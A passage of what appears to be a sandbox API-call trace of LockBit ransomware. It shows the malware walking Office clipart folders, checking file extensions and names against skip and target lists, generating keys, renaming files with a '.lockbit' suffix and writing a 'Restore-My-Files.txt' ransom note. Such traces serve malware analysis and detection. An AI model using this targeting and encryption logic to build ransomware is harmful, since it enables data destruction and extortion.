lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.322] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.lockbit") returned 72 [0121.322] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0121.324] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.324] malloc (_Size=0x40068) returned 0x3df0008 [0121.324] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15145) returned 1 [0121.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.325] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.363] malloc (_Size=0xa6) returned 0x77d7a8 [0121.363] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.364] free (_Block=0x77d7a8) [0121.364] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.364] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.365] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1bf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099161.JPG", cAlternateFileName="")) returned 1 [0121.365] lstrcmpiW (lpString1=".", lpString2="J0099161.JPG") returned -1 [0121.365] lstrcmpiW (lpString1="..", lpString2="J0099161.JPG") returned -1 [0121.365] PathFindExtensionW (pszPath="J0099161.JPG") returned=".JPG" [0121.365] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.365] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.365] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.365] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.365] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.365] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.365] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.366] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.366] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.367] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.367] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.367] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.367] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.367] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.367] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099161.JPG") returned 1 [0121.367] lstrcmpiW (lpString1="ntldr", lpString2="J0099161.JPG") returned 1 [0121.367] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099161.JPG") returned 1 [0121.367] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099161.JPG") returned -1 [0121.367] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099161.JPG") returned -1 [0121.367] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099161.JPG") returned 1 [0121.367] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099161.JPG") returned -1 [0121.367] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.367] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned=".JPG" [0121.367] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.368] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.368] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.369] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.369] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.369] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.369] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.369] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.369] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.lockbit") returned 72 [0121.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.370] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.370] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.370] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7154) returned 1 [0121.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.371] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.376] malloc (_Size=0xa6) returned 0x77d7a8 [0121.376] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.378] free (_Block=0x77d7a8) [0121.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x4cc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099162.JPG", cAlternateFileName="")) returned 1 [0121.378] lstrcmpiW (lpString1=".", lpString2="J0099162.JPG") returned -1 [0121.378] lstrcmpiW (lpString1="..", lpString2="J0099162.JPG") returned -1 [0121.378] PathFindExtensionW (pszPath="J0099162.JPG") returned=".JPG" [0121.378] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.379] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.379] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.380] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.380] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099162.JPG") returned 1 [0121.380] lstrcmpiW (lpString1="ntldr", lpString2="J0099162.JPG") returned 1 [0121.380] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099162.JPG") returned 1 [0121.380] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099162.JPG") returned -1 [0121.380] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099162.JPG") returned -1 [0121.380] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099162.JPG") returned 1 [0121.381] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099162.JPG") returned -1 [0121.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned=".JPG" [0121.381] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.381] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.381] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.382] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.lockbit") returned 72 [0121.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.383] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.383] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.383] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19656) returned 1 [0121.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.384] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.389] malloc (_Size=0xa6) returned 0x77d7a8 [0121.389] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.390] free (_Block=0x77d7a8) [0121.390] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.390] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.392] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x5754, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099163.WMF", cAlternateFileName="")) returned 1 [0121.392] lstrcmpiW (lpString1=".", lpString2="J0099163.WMF") returned -1 [0121.392] lstrcmpiW (lpString1="..", lpString2="J0099163.WMF") returned -1 [0121.392] PathFindExtensionW (pszPath="J0099163.WMF") returned=".WMF" [0121.392] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.392] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.393] 